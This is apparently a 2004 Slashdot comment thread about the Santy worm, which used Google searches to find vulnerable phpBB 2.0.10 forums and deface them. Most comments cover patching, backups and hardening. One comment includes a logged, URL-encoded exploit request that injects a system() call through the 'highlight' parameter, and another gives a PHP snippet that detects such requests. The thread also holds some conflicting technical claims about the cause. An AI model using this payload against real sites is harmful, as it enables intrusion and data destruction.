Net Worm Uses Google to Spread

troop23 writes "A web worm that identifies potential victims by searching Google is spreading among online bulletin boards using a vulnerable version of the program phpBB, security professionals said on Tuesday. Almost 40,000 sites may have already been infected. In an odd twist if you use Microsoft's Search engine to scan for the phrase 'NeverEverNoSanity'-- part of the defacement text that the Santy worm uses to replace files on infected Web sites--returns nearly 39,000 hits." Reader pmf sent in a few more information links: F-Secure weblog and Bugtraq posting. Update: 12/22 03:34 GMT by T : ZephyrXero links to this news.com article that says Google is now squashing requests generated by the worm.

Quick!

Someone figure out a way to blame this on Microsoft!

Re:Quick!

[ptr2004]

In other news. A tele-marketer used a telephone directory to make calls

Re:Quick!

[geekopus]

It might be quite the opposite:

When I copied all these entries out of the log and translated the chr()
calls, they turned out to be the attached perl script, which is capable
of finding .html files to deface, and then going to google and finding
more instances of phpbb to infect.

This is from one of the links above. So, it sounds like if a machine doesn't have Perl installed, the thing can't go to work. By sheer coincidence, most windows boxes will be immune to this particular instance of this worm (by not having Perl installed).

That's not to say that it can't be modified to carry a more portable payload. Thank god the payload wasn't itself written in PHP.

Re:Quick!

[AmberBlackCat]

Someone figure out a way to blame this on Microsoft!

The PHP guys will probably blame it on Apache 2.

Under the Google radar

[Meostro]

I saw this yesterday on a.... uhh... "anatomic reference" site:
This site is defaced!!! NeverEverNoSanity WebWorm generation 10.

I tried to find some kind of reference and Googled for it, but I got no results.

Still nothing on it, wonder how long it'll be before it shows up?

MSN search returns 3 results, that's just a bit short of 39,000, so I guess they must be using the beta engine for the article.

Re:Under the Google radar

[rednip]

even better, I did a search on the beta msn site for 'NeverEverNoSanity WebWorm generation', the best that I got as a search result was 20 (well the first couple of pages), but the site read 11 when I went to it, I suppose that the worm is writing over it's own defacement.

Re:Under the Google radar

umm.. that's just the eicar.com AV test file.. not really a virus - just a file that sets off your AV software so you know it's working. why is this informative?

Re:Under the Google radar

[northcat]

OMG! How is parent funny?!? Is this some bizzare experiment by slashdot mods?

Re:Under the Google radar

[orangesquid]

You can search for specific generations ( http://beta.search.msn.com/results.aspx?q=%22Never EverNoSanity+WebWorm+generation+4%22&FORM=QBRE ) to see the spread:
0, 1, 2, 3 - no hits
4 - 2335 hits
5 - 9297 hits
6 - 7218 hits
7 - 7288 hits
8 - 10746 hits
9 - 12009 hits
10 - 11752 hits
11 - 14866 hits
12 - 13267 hits
13 - 8393 hits
14 - 13317 hits
15 - 3840 hits
16 - 5004 hits
17 - 1950 hits
18 - 3344 hits
19 - 6 hits
20 - 1 hit
21 - 3 hits
22 - 1 hit
23 - 1 hit
24 - 1 hit
25, 26, 27, 28, 29, 30 - no hits

Re:Under the Google radar

[defrabelizer]

Google found it. At last, and quite a couple generations to: Gen : Hits 1 : 639 2 : 572 3 : 508 4 : 443 5 : 404 6 : 434 7 : 351 8 : 87 9 : 198 10 : 96 11 : 102 12 : 40 13 : 109 14 : 208 15 : 228 16 : 110 17 : 30 18 : 150 19 : 49 20 : 8 21 : 3 22 : 1 23 : 1 24 : 3 25 - 30: none Ok, well, google dint find as many See what happens when we let script kiddies learn perl

Head line is way to misleading

[mkop]

There is nothing wrong with google. only with people who have not pathced the php buletin boards

Re:Head line is way to misleading

[taylortbb]

Actually, it doesn't have to do with unpatched phpBB installations. It has to do with unpatched PHP installations.

phpBB has an explanation of what the problem is, it can be found at:
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=24 8046

OTHER FORUMS ARE VULNERABLE

(and no, I am not a phpBB zealot, I am pointing out a misconception)

Re:Head line is way to misleading

[a16]

No, what you are saying is false. The phpBB 2.0.10 security issue is not related in any way to the PHP exploits discovered recently. And this worm uses the 2.0.10 exploits, not PHP.

Re:Head line is way to misleading

[sr180]

A board I assist to admin was done and it Runs Invision Power Board on PHP. The worm kept knocking it over, originally it started as version 1.2 but eventually changed to version 1.3.

That indicates to me that someone may have been doing some active development on it...

Poor /.

[roman_mir]

I think this virus/worm hit /., when I clicked on the link to this article, all I saw was: "Nothing for you to see here. Please move along."

Latest Version of phpBB Unaffected

[akiy]

It looks like the latest phpBB version 2.0.11 or a simple patch will thwart the worm, though. Time to upgrade if you haven't yet!

Re:Latest Version of phpBB Unaffected

[MightyMartian]

> It looks like the latest phpBB version 2.0.11 or a simple patch will thwart
> the worm, though. Time to upgrade if you haven't yet!

That's alright. All the lazy admins will blame Google and everything will be okay!

This, I suspect, is going to be a new way of infecting web-based apps. Just do a search for the vulnerable software on Google, Yahoo or whatever, pop in, do your damage and be on your way.

Of course, it will get much worse if its some sort of E-commerce software or something like that and these worms happily start stealing credit card transactions.

Re:Latest Version of phpBB Unaffected

[Cutriss]

Yes and no.

It will protect your boards from being targeted by the Google component of the worm. However, if your boards are running on a shared server, and someone else has a vulnerable version of phpBB installed on their space, you could still be vulnerable. The worm is designed to poke around once it manages to lodge itself inside a host.

Ordinarily, you could just blame those infected in this manner for not using proper permissions on their board installs, but with the amount of custom modifications many people have installed on their boards, it'd be no surprise if 90% of the people that think they're safe actually aren't. Make sure your files aren't writeable, folks.

Re:Latest Version of phpBB Unaffected

[topynate]

Given that probably 90% of script kiddies find targets with Google, it could only be a matter of time before someone automated the process.

Maybe it's a theme - the worms of tomorrow will do what the script kiddies of today do.

Re:Latest Version of phpBB Unaffected

[Martin+Blank]

Good job. You do know that by Slashdotting the phpBB.com server, you're preventing people from patching, right? :)

Re:Latest Version of phpBB Unaffected

[Tony+Hoyle]

phpBB is very hard to upgrade.

To install many plugins requires making changes to the source by hand. Some of the websites I host have several of these, and I'm not even sure which ones (I didn't add them).

Plus, if you use a custom theme you have to recreate it after upgrading, which is a right pain in the arse as all the paths are hardcoded... even with sed/grep it takes an hour or two to turn subSilver into CustomSilver.

If the virus goes senile...

[StevenHenderson]

it can always use Google Suggest to find victims. :)

And in a complete upset

[Marxist+Hacker+42]

Microsoft search beats Google at indexing pages hacked by this virus! MS Search turns up 39000 pages, google turns up zero on the same nonsense keyword!

Infect Slashdot

[somethinghollow]

When it infects sites running SlashCode, it pretends to be a legitament post (so it can get the defacement tag "NeverEverNoSanity" on the front page, then monitors for posting, and tries to get first post, too.

Re:Infect Slashdot

[sconeu]

How is that different from most non-virus posts?

I got hit HARD! :(

[Broadband]

This worm is unbelieveably evil.

What it does is search all volumes on the server for files with the .asp .php .shtml .html .htm extentions and overwrites them with the 264 byte file that simply states "Web site defaced"

I had a backup drive with everything mirrored that was unshared and secure and it managed to overwrite my ENTIRE backup as well on that machine.

I've been spening the past 24 hours picking up the pieces and trying to get everything back online. 1/2 Done now.

If you want to see what a defaced website looks like go to: http://www.sherwoodoregon.com and check it out before i get that site back online.

-BB

Re:I got hit HARD! :(

That's why I don't call it a backup if it's hot. If you just put in a second drive, it doesn't save you from 'rm -rf /' or from a power supply that commits suicide... and decides to take the rest of the hardware with it.

Backups are on cold hardware, on a shelf. At the minimum. Preferably in another building.

snort signatures

[UnderAttack]

The ISC posted a couple of snort sigs and other details.

Re:Hmmmm

[Sikmaz]

Different Exploit, that is a seperate problem that allows people to do even more bad things such as reading your config.php to get your sql password. A workaround is available from http://www.phpbbstyles.com/viewtopic.php?t=1903 if you can't install 4.3.10

Dshield disagrees

[JustinXB]

See here

Note: we earlier reported that it takes advantage of a php vulnerability. This does not seem to be the case.

Who are you going to believe: Some news site or a security community?

This is kind of sad...

[The+Hobo]

I had forgotten the MSN beta search engine, so I just googled it...

My Christmas gift! Noooooo!

[286]

So I get my present, in the mail, a little early.
A new HDTV card...
I go to download the linux only drivers and...

NeverEverNoSanity!!!

Argh! &$@*#! Humbug.

Re:NeverEverNoSanity

[Loether]

The virus is searching google for sites not yet infected. Googling for "Powered by phpBB" does return results. Some of which are now defaced.

If google wants to stop the virus then they could disable "Powered by phpBB" as a search term. The reason "NeverEverNoSanity" doesn't come up on google is becuase googlebot is extreamly slow to index new content on most sites.

Re:A few things..

[psyon1]

No, as someone else already responded to other posts, it is a phpBB problem. phpBB calls the urldecode() function on form variables, after PHP already does so. It allows ' to bypass the magic quotes that php so lovingly puts on all our form data. The latest bug reports were reported after the release of the exploit for phpBB 2.0.10 and earlier. IIRC the report said that some scripts MAY be vulnerable, but didnt state for certain. As far as I know, no one has yet to release an exploit for the bugs, its just a possibility.

Ehhh.. Tape drive perhaps??

[scsirob]

This is the main issue with harddisks as backup. They don't provide security against these kind of attacks as they are just as vulnerable as any other disk attached to the system.

A tape drive for backups may seem like a 'thing from the past', but it's *very* effective in these instances...

Re:Ehhh.. Tape drive perhaps??

[Zen+Punk]

Nonsense. A hard drive on the shelf, in the safe, whatever, is no more vulnerable than a tape on the shelf. If you left your backup tape mounted all the time, it would be just as insecure as adding a second drive and calling it a "backup."

Re:Ehhh.. Tape drive perhaps??

[Woody77]

In order to have any kind of automated backup solution, a human attacker will be able to get to it.

I see a couple easy blocks to these, though:

1) write a shell script for mounting the backup drive, both onto the SCSI chain and into the filesystem, performing the backup, and then unmount it.

2) round-robin the drives on a regular basis, so an IT monkey can physically swap out sets when needed to provide off-site storage (basically use hot-swap bays like very large, fast tape jukeboxes).

3) encrypt the pertinent scripts, and use yet another script with a bening name to perform the decryption of the shell script, the chmod to executable of it, and then exec'ing it.

****

Yes, it's still hackable, but it ups the bar considerably, and if you're swaping the drives out nightly/weekly, you've got good backups that are offline, and not too old.

For all of you saying it's a PHP exploit

[VeneficusAcerbus]

From ISC:

Note: we earlier reported that it takes advantage of a php vulnerability. This does not seem to be the case. The worm exploits the 'highlight' bug in phpBB 2.0.10 and earlier. The current version of phpBB (2.0.11, released Nov. 18th) fixes this problem. Nevertheless, its still a good idea to update php.

I got hit

[Ghoser777]

My poor linux box - I felt so secure and then this little worm gets out. Thank god I had some recent backups, otherwise this would have really sucked. I guess it's alright though - you have to get rooted one time before you really understand how vulnerable the internet makes all of us.

Re:I got hit

[tchuladdiass]

Not only keep up on patches, but also seperation of services. Your web server should run under a chrooted environment at minimum, as a non-privlidged user. Any files that doesn't need to be written to by the web applications (including html and cgi files) should be owned by a different user id (and not world-writable).

The most secure setup I've come up with is setting up Usermode Linux (or Linux Vservers) so that I have a bunch of virtual OS's running, each with only the bare minimum libraries that are needed to support each one's dedicated services (got one set up for bind, sendmail, apache). Each virtual OS session has multiple network interfaces (one is set up as an "internal" network only, another is set up to accept packets redirected from the outside vi iptables rules). Any config/data files that I need to update periodicaly (such as the html files for the web server process) live in a partition on the parent server, NFS exported read-only to the appropriate session's internal virtual ip address. Any files that they need to write to are symlinked to a locally-owned filesystem. Log files are set up append only (still working on this, I was thinking of using one of the user-space filesystems to impliment this feature, or checking if selinux can handle that).

The Robot Threat

[D_Lehman(at)ISPAN.or]

Robots aren't bad, they help people find things, and get them to your site. However, if you would rather keep them away from you, consider using your robots.txt http://www.robotstxt.org/ along with meta tags on pages. You can also set certain content to be filtered out by looking at the connecting agent. Things you should consider filtering out would be admin links/pages, version numbers (often in the footer of pages), and files that aren't related to content. There's no reason for Google to know what your login pages look like, for instance.

If I've said it once, I've said it 1000 times. When you secure the old tech first, you find fewer problems with the new tech. robots.txt, .htaccess, proper chmod/chown... these are the things that can prevent a new bug from being a really bad new bug.

Not PHP Bugs - phpBB exploit is used

[a16]

As per the parent of this post, the post modded '+5 Informative' is false and includes the wrong announcement.

This is not caused by the php bugs, it uses an issue in phpBB 2.0.10 and below. 2.0.11 fixes this, and has been available for ages (over a month).

So in summary, if you use phpBB - upgrade to 2.0.11 now - not upgrading is not an option.

I feel the above needs to be clarified, as there are already numerous people posting false information. Upgrading your PHP version won't protect against this (but you need to do it anyway to protect against other issues) - upgrading to phpBB 2.0.11 will. Simple :)

Re:address tag and no robots

[daten]

The ADDRESS element may be used by authors to supply contact information for a document or a major part of a document such as a form. This element often appears at the beginning or end of a document.

http://www.w3.org/TR/html401/struct/global.html#ed ef-ADDRESS

I've used it for years. By the way, how often do you review the html source of webpages you visit?

This one's fun to debug - perl via url

[falzbro]

I got this on a few servers yesterday- first thought it was related to the < PHP 4.3.10 bugs- it's not.

This exploit is actually quite clever. It inputs values into the URL field that use the chr() function in PHP to pass text. It then writes its own perl script and executes it on the server.

Here's the first line from the logfile:

[20/Dec/2004:11:05:48 -0600] "GET /forum/viewtopic.php?p=738&sid=2db342b717c89bf9eca 3ef07e4910bf6&highlight=%2527%252Esystem(chr(112)% 252echr(101)%252echr(114)%252echr(108)%252echr(32) %252echr(45)%252echr(101)%252echr(32)%252echr(34)% 252echr(111)%252echr(112)%252echr(101)%252echr(110 )%252echr(32)%252echr(79)%252echr(85)%252echr(84)% 252echr(44)%252echr(113)%252echr(40)%252echr(62)%2 52echr(109)%252echr(49)%252echr(104)%252echr(111)% 252echr(50)%252echr(111)%252echr(102)%252echr(41)% 252echr(32)%252echr(97)%252echr(110)%252echr(100)% 252echr(32)%252echr(112)%252echr(114)%252echr(105) %252echr(110)%252echr(116)%252echr(32)%252echr(113 )%252echr(40)%252echr(72)%252echr(89)%252echr(118) %252echr(57)%252echr(112)%252echr(111)%252echr(52) %252echr(122)%252echr(51)%252echr(106)%252echr(106 )%252echr(72)%252echr(87)%252echr(97)%252echr(110) %252echr(78)%252echr(41)%252echr(34))%252e%2527 HTTP/1.0" 200 22613 "http://example.com/forum/viewtopic.php?p=738&sid= 2db342b717c89bf9eca3ef07e4910bf6&highlight=%2527%2 52Esystem(chr(112)%252echr(101)%252echr(114)%252ec hr(108)%252echr(32)%252echr(45)%252echr(101)%252ec hr(32)%252echr(34)%252echr(111)%252echr(112)%252ec hr(101)%252echr(110)%252echr(32)%252echr(79)%252ec hr(85)%252echr(84)%252echr(44)%252echr(113)%252ech r(40)%252echr(62)%252echr(109)%252echr(49)%252echr (104)%252echr(111)%252echr(50)%252echr(111)%252ech r(102)%252echr(41)%252echr(32)%252echr(97)%252echr (110)%252echr(100)%252echr(32)%252echr(112)%252ech r(114)%252echr(105)%252echr(110)%252echr(116)%252e chr(32)%252echr(113)%252echr(40)%252echr(72)%252ec hr(89)%252echr(118)%252echr(57)%252echr(112)%252ec hr(111)%252echr(52)%252echr(122)%252echr(51)%252ec hr(106)%252echr(106)%252echr(72)%252echr(87)%252ec hr(97)%252echr(110)%252echr(78)%252echr(41)%252ech r(34))%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

If you decode the ascii characters, you get:

perl -e "open OUT,q(>m1ho2of) and print q(HYv9po4z3jjHWanN)"

I didn't have enough freetime to decode the whole thing due to.. actual work having to be done, but it's quite clever.

--falz

Re:This one's fun to debug - perl via url

Dunno about you guys but I've been getting hits like that since NOVEMBER when the highlight bug first surfaced.

You might want to amuse yourself with the following PHP code, add to viewtopic.php right after it checks "isset($HTTP_GET_VARS['highlight']))"...

if (preg_match('/chr\(/', $HTTP_GET_VARS['highlight'])) {
$h = preg_replace('/(?:%2e)?chr\((\d+)\)/ei', 'chr(\1)',
$HTTP_GET_VARS['highlight']);
$h = preg_replace('/%2e/i', '', $h);
$h = preg_replace('/%27/', "'", $h);
error_log("viewtopic hack attempt: $h", 0);
}

Then it will show you the hack attempts in the error log.

Be sure to upgrade your PHP and phpBB FIRST! ;-)

MSN actually returns 207 results

[bharatman]

MSN's first page estimates are always grossly inflated. Try this link instead:

http://beta.search.msn.com/results.aspx?q=NeverE ve rNoSanity&first=200&count=10&FORM=PERE4

Note that I the "first" param is 200 (which is the equivalent of going to page 20). It hits the end of the results and revises its estimate.

Clarification

[Sheepdot]

I had to explain this to a colleague earlier in layman's terms, so I'm repeating it here:

For those of you who think this is solely a PHP or PHPBB bug, it's actually quite a bit more involved than that. A series of exploits for PHP were released, and subsequently, a lot of forum software, not just phpBB, is exploitable.

This worm uses a legitimate function which the phpBB developers have for functionality of their forum software. This legitimate function is exploitable in certain versions of PHP. Due to the speed in which the exploit was released, it could be that the worm developer had the engine ready and was simply looking for a PHP exploit to come out for a function that was used with a widely available web application package. They hit jackpot with phpBB and PHP together.

The developer didn't thinking to make it so that it added a random element to it's Google searches or didn't use different search engines. In fact, it almost looks like this was simply a trial run for a future worm that will be much more complex and may possibly span a multitude of web applications.

A concept was written up earlier this year here:
http://www.imperva.com/application_defense_ center/ white_papers/application_worms.html?show=appworm

It now appears that niddhog (the concept worm) has been made evident. Fortunately, it did not include such things as Code Red and Nimda did with using IE exploits to infect the clients that would view these websites.

It is a bleak future with the idea of Web Application Worms coupled with IE exploits. Not only do you have the method and distribution combined, but such a thing would be highly anonymous for the malware author and could spread to the highest point of infection in a matter of hours as IE users visited their favorite community websites running exploitable forum software.

Re:Clarification

[ScottMacVicar]

I've been looking at the PHP related security hole and this does not have anything to do with the exploit the worm uses.

The PHP exploit was to do with the length part of a serialized string, it wasn't correctly enforced and a suitably large enough value would crash a crash and print out contents of the stack which could include any variable within the script. s:1000:"test"; the 1000 part is not correctly checked.

The phpBB exploit is regarding a remote code execution vulnerability, in this case it uses this vulnerability to fetch a perl script from a remote server and write it to the forum before executing it using the system command in PHP.

So this worm only affects phpBB 2.0.10 and below.

My webserver just got hit by this

[AC-x]

Looking at all the automatic PHP error responses, it seems that as long as the web server's task does not have write access to the web sites folder you're safe.

Re:Everyone sets 'chmod 666' on their files nowada

[Just+Some+Guy]

The worm didn't touch a single file not owned by user 'www' - just the few thousand files that were.

Download the full source code

[EqualSlash]

Looks like you didn't read the Bugtraq posting completely... There's an zip attachment with the fully decoded perl script.
Download link

Re:phpBB2 need a security mailing list

[lightdarkness]

There is indeed a way to get updates. On source forge, you can subscribe to get updates when new packages are released.

Re:phpBB2 need a security mailing list

[a16]

Don't spread FUD.
Sourceforge offers release trackers which the phpBB team openly point people to if they want mail updates:
http://sourceforge.net/project/filemodule_monitor. php?filemodule_id=28882
Or of course, there is the RSS feed :
http://www.phpbb.com/rss.php
And, after 'popular demand' they are currently working on a special security mailing list that people can subscribe to.

MOD PARENT UP

[a16]

The worm is related to an issue in phpBB 2.0.10 as per the parent, nothing to do with any PHP issues.

I do wish mods would be careful when modding posts that they obviously no nothing about as 'informative' - to be 'informative' you have to give correct information, not just information that looks technical enough to be correct.

Worm's genealogy?

[Azul]

Searching for "neverevernosanity webworm generation X" on MSN Beta Search yields the following number of results for each value of X:

1: 0
2: 0
3: 0
4: 2335
5: 9297
6: 7218
7: 7288
8: 10746
9: 12009
10: 11752
11: 14866
12: 13267
13: 8393
14: 13317
15: 3840
16: 5004
17: 2032
18: 3344
19: 7
20: 1
21: 3
22: 1
23: 1
24: 1
25: 0

Hmm, if these numbers are to be trusted, the infections are 10.5 generations old, on average.

Interestingly, these numbers add to 124k, much more than the reported 39k number of pages reported by merely searching for "NeverEverNoSanity". This would imply that many of the defaced pages contain messages for different generations. Weird.

It would be interesting if the defaced pages included the URL of the parent, the one that the worm used to infect the server from which it infected the current one.

Found this in my server logs

[Chatmag]

http://www.hackgeneral.net/phpbb_exploit.php

When I first saw that page a few days ago, it had several boxes for inputs, the site URL, code, and execute button. The page is now gone, and if someone speaks Spanish, please let us all know what the site is about.